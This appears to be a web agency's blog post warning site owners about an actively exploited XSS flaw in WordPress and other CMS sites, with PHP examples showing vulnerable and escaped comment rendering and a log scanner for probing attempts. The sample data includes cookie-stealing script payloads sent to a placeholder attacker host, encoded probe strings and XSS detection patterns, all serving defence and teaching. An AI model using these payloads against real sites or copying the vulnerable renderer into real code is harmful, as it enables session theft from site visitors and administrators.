Revamped Vulnerability Invades Most Dynamic Websites
Do you own or manage a website? If so, the Cross-site Scripting (XSS) vulnerability may rear its ugly head, again…
In the last two weeks a major security flaw was disclosed that attackers are actively exploiting. This cross-site scripting (XSS) vulnerability potentially affects most dynamic sites. Sites running on WAMP (Windows, Apache, MySQL, PHP) or MAMP (Mac, Apache, MySQL, PHP) servers are at high risk, not because of Apache or MySQL themselves, but because those stacks usually run a PHP CMS and plug-ins, and it is the CMS and plug-in code that renders visitor-supplied input into the page without escaping it.
NOTE: If you only serve static HTML pages (no server-side code, and no scripts that read the page address for content), stop here; this flaw does not apply to you.
If you do have a dynamic site, one where the server builds each page on request, oh snap, read on! In less technical terms: if you use WordPress, Drupal or Joomla, or a similar Content Management System (CMS), it is likely you are affected.
What does this really mean?
What are hackers doing with this vulnerability? An XSS flaw lets an attacker plant script that runs in another visitor's browser, ideally an administrator's. From there they can steal the login session, create a new administrator account, or inject content and links into your pages. The end goal is typically private information kept behind the login, which could include bank records, medical records and credit card numbers. Basically, they are on a treasure hunt for anything stored on servers they can exploit and sell on the black market. As an example, if you are using the WordFence plug-in for WordPress, you may have noticed an increase in attempts to log in to your site with the "admin" username; that is a separate brute-force attack rather than XSS, but it comes from the same crowd scanning for weak sites.
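To make the mechanism concrete, here is an added example that is not code from the original post or from WordPress itself: a minimal comment renderer in plain PHP 7.1+, shown first the vulnerable way and then with output escaping. The two comments, the attacker.example host and the function names are all constructed for the illustration; in WordPress the equivalent escaping helpers are esc_html(), esc_attr() and esc_url().

```php
<?php
// Added example, not code from the original post or from WordPress: a minimal
// comment renderer showing how a stored XSS payload ends up in a page and how
// context-aware output escaping neutralises it. Plain PHP 7.1+; in WordPress
// the equivalent helpers are esc_html(), esc_attr() and esc_url().
declare(strict_types=1);

// Constructed sample data: two comments as they might sit in the database.
// The second one carries a cookie-stealing script in the body and a
// javascript: URL in the website field (attacker.example is a placeholder).
$comments = [
    [
        'author'  => 'Friendly Reader',
        'website' => 'https://example.com/',
        'body'    => 'Great post, thanks! 5 > 3 as always.',
    ],
    [
        'author'  => 'attacker',
        'website' => 'javascript:fetch("https://attacker.example/?c="+document.cookie)',
        'body'    => '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
    ],
];

// VULNERABLE: stored strings are dropped straight into the HTML. Whoever views
// the page, including an administrator, runs the attacker's script.
function render_comment_vulnerable(array $c): string
{
    return "<li><a href=\"{$c['website']}\">{$c['author']}</a>: {$c['body']}</li>";
}

// Escape for HTML text or a double-quoted attribute value.
function esc_html_ctx(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// A link needs scheme allow-listing on top of escaping: "javascript:" is
// harmless as text but executes when the anchor is clicked.
function esc_url_ctx(string $url): string
{
    $url = trim($url);
    if (!preg_match('#^https?://#i', $url)) {
        return ''; // not an http(s) URL: drop the link entirely
    }
    return esc_html_ctx($url);
}

// HARDENED: every untrusted value is escaped for the context it lands in.
function render_comment_safe(array $c): string
{
    $author = esc_html_ctx($c['author']);
    $href   = esc_url_ctx($c['website']);
    $link   = $href === '' ? $author : "<a href=\"$href\" rel=\"nofollow\">$author</a>";
    return '<li>' . $link . ': ' . esc_html_ctx($c['body']) . '</li>';
}

foreach ($comments as $c) {
    echo "VULNERABLE: ", render_comment_vulnerable($c), PHP_EOL;
    echo "SAFE:       ", render_comment_safe($c), PHP_EOL, PHP_EOL;
}
```

Run it with php on the command line and compare the two outputs for the second comment: the vulnerable renderer emits a working script tag and a clickable javascript: link, while the safe renderer turns the script into visible text and drops the link. The point a theme or plug-in developer should take from it is that escaping depends on where the value lands; HTML-escaping a URL is not enough on its own.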
WordFence founder and CEO Mark Maunder sent a mass email to all WordFence subscribers asking them to update to WordPress 4.2.1, stating that "they have noticed a significant amount of WP sites that are still vulnerable".
Other CMS core providers, plug-in and theme developers continue to roll out patches in response to this critical flaw.
Watch out for free themes and non-premium theme developers. Because they provide their work for free, they are the least likely to respond quickly to security fixes like this one, or to respond at all, leaving your site exposed until the theme is updated or replaced.
What can I do?
- Are you a Fusion4 client? Yes? Then rest easy!
- We applied all necessary updates as soon as our security expert Justin D. Luke first advised us of the exploitation.
- If not, and the instructions are within your wheelhouse:
- Update everything: the CMS core, all themes and all plug-ins. Most CMS providers have shipped core updates that remedy the issue, and plug-in authors are shipping their own.
- Check your analytics and, better still, your web-server access logs. An increase in foreign activity, or requests whose addresses carry fragments like "<script" (often URL-encoded as "%3Cscript"), means attackers are probing your site or already using it for their mischief.
- If you are using WordPress, require that comments be approved before they are published (Settings → Discussion → "Comment must be manually approved") and trash any suspicious comments on your blog posts.
- If you are using any of the plug-ins listed below, either temporarily deactivate them or update them immediately. More than 400 plug-ins have the vulnerability, but this is a good start:
- WordPress SEO
- Google Analytics
- All in One SEO
- Gravity Forms
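For the log-checking step above, here is an added example (not from the original post) that scans access-log lines for the signs of XSS probing the list describes. It is plain PHP 7.1+ so it runs anywhere a WordPress site does; the five sample log lines, the IP addresses and the pattern list are all constructed for the illustration, and the patterns are heuristics that may need tuning for your site.

```php
<?php
// Added example, not from the original post: scan web-server access-log lines
// for requests typical of XSS probing or exploitation. Plain PHP 7.1+.
// Usage: php xss_log_check.php /var/log/apache2/access.log
// With no argument it runs against the constructed sample lines below.
declare(strict_types=1);

// Constructed sample lines in Apache "combined" format. Two are ordinary
// traffic; three carry XSS payloads, including URL-encoded and
// double-encoded variants that a plain search for "<script" would miss.
const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [30/Apr/2015:10:01:02 +0000] "GET /blog/hello-world/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Apr/2015:10:01:09 +0000] "GET /wp-content/themes/x/style.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.7 - - [30/Apr/2015:10:02:15 +0000] "GET /?s=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 4311 "-" "curl/7.40"
198.51.100.7 - - [30/Apr/2015:10:02:20 +0000] "GET /wp-admin/admin.php?page=seo&x=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 302 0 "-" "curl/7.40"
198.51.100.9 - - [30/Apr/2015:10:03:01 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0 "javascript:alert(document.cookie)" "Mozilla/5.0"
LOG;

// Fragments that are rarely legitimate in a URL, referer or user agent.
// The "on...=" rule is the noisiest (it also matches e.g. "?on=1"); treat
// hits as something to look at, not proof of an attack.
const XSS_PATTERNS = [
    '/<script\b/i',
    '/<\/script>/i',
    '/\bon[a-z]+\s*=/i',          // onerror=, onload=, onmouseover= ...
    '/javascript\s*:/i',
    '/<(img|svg|iframe|object)\b/i',
];

// Undo URL encoding repeatedly (bounded) so double-encoded payloads surface.
function decode_fully(string $s, int $maxRounds = 3): string
{
    for ($i = 0; $i < $maxRounds; $i++) {
        $decoded = rawurldecode($s);
        if ($decoded === $s) {
            break;
        }
        $s = $decoded;
    }
    return $s;
}

// Return the first matching pattern for a log line, or null if it looks clean.
function classify_line(string $line): ?string
{
    $decoded = decode_fully($line);
    foreach (XSS_PATTERNS as $pattern) {
        if (preg_match($pattern, $decoded)) {
            return $pattern;
        }
    }
    return null;
}

// Scan a sequence of lines, returning [line number => pattern] for hits.
function scan_log(iterable $lines): array
{
    $hits = [];
    $n = 0;
    foreach ($lines as $line) {
        $n++;
        $pattern = classify_line(rtrim($line, "\r\n"));
        if ($pattern !== null) {
            $hits[$n] = $pattern;
        }
    }
    return $hits;
}

$lines = isset($argv[1])
    ? new SplFileObject($argv[1])       // streams a real log line by line
    : explode("\n", SAMPLE_LOG);

foreach (scan_log($lines) as $n => $pattern) {
    printf("line %d matched %s\n", $n, $pattern);
}
```

On the sample data lines 3, 4 and 5 are reported and the two ordinary requests are not. Line 4 is the instructive one: it only matches after two rounds of URL decoding, which is why the script decodes until nothing changes rather than once. If the scan turns up hits from addresses you do not recognise, that is the "foreign activity" the checklist warns about, and the plug-in named in the request path is a good first candidate to update or deactivate.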
If you simply don't speak "geek", or any of this falls outside your wheelhouse, contact us at fusion-4.com and we can help you remedy the situation.
Given the long list of variables that can leave the door open to attackers, lean on industry folks like us as we continue to work towards slamming the door shut on exploitation.
Contributing editors: Danny J Johnson (web application design and development) and Justin D. Luke (cyber security, SQL, programming) for Fusion-4.